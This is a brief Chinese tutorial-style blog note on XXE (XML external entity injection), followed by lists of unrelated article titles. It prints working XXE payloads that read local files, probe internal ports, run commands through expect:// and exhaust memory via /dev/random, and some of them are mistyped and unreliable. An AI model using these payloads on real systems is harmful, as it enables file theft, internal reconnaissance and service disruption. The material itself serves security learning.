XXE漏洞

佚名 / 2023-08-21 / 原文

XXE漏洞

xml external entity injection外部实体注入

$xml = simplexml_load_string($data);//运行xml语句

危害：

可以读取磁盘上的文件

<?xml version="1.0" encoding="utf-8"?><!doctype note[<!ENTITY xxe SYSTEM "file://E://in.txt">]><login>&xxe;</login>

端口扫描

<!ENITY xxe SYSTEM "http://127.0.0.1:3306">

如果端口未开放会出现报错

执行命令

需要安装expect扩展

<?xml version="1.0" encoding="utf-8"?>

<!doctype note[

<!ENTITY xxe SYSTEM "expect://ipconfig">]>

<root>

</root>

对内网进行攻击

内容膨胀占用大量内存

xxe炸弹，服务器中断

< !ENTITY bomb” file:///dev/random"I >]><msg>&bomb;</msg>

XXE漏洞更多相关文章

Redis持久化机制（面试考点）与位图API

NOIP2024模拟赛20 & 11.1 小记

20241101 数据结构与算法期中机试收获

什么是IT技术

即将到来！

舍得-时间-工作是人的一生最重要的事情-自己要有私房钱-人的一生最重要的事情是书写自己的人生

2.TiUP 部署 DM 集群

ubuntu 24.04 部署 mysql 8.4.3 LTS

随机推荐

yolo --- 核心思想

【游记】CCPC 济南 2024 游记

AJAX & AXIOS-2024/11/1

验证码处理在自动化测试中的应用

一些学科笑话

NOIP2024模拟赛20 & 11.1 小记

20241101 数据结构与算法期中机试收获

Java，启动！

什么是IT技术

即将到来！

2024/11/1日日志关于JavaScript简介&引入方式以及基础语法的学习

舍得-时间-工作是人的一生最重要的事情-自己要有私房钱-人的一生最重要的事情是书写自己的人生

2.TiUP 部署 DM 集群

原型模式的C++实现

python bytecode解析

09-XSS键盘监听、cookie窃取&文件上传绕过

ubuntu 24.04 部署 mysql 8.4.3 LTS

国标GB28181公网平台LiteGBS国标GB28181视频平台建筑工地无线视频联网监控系统方案

imes完工下线

android 13 更改手机信号调整

XXE漏洞

XXE漏洞

危害：

可以读取磁盘上的文件

端口扫描

执行命令

对内网进行攻击

XXE漏洞更多相关文章

随机推荐

热门话题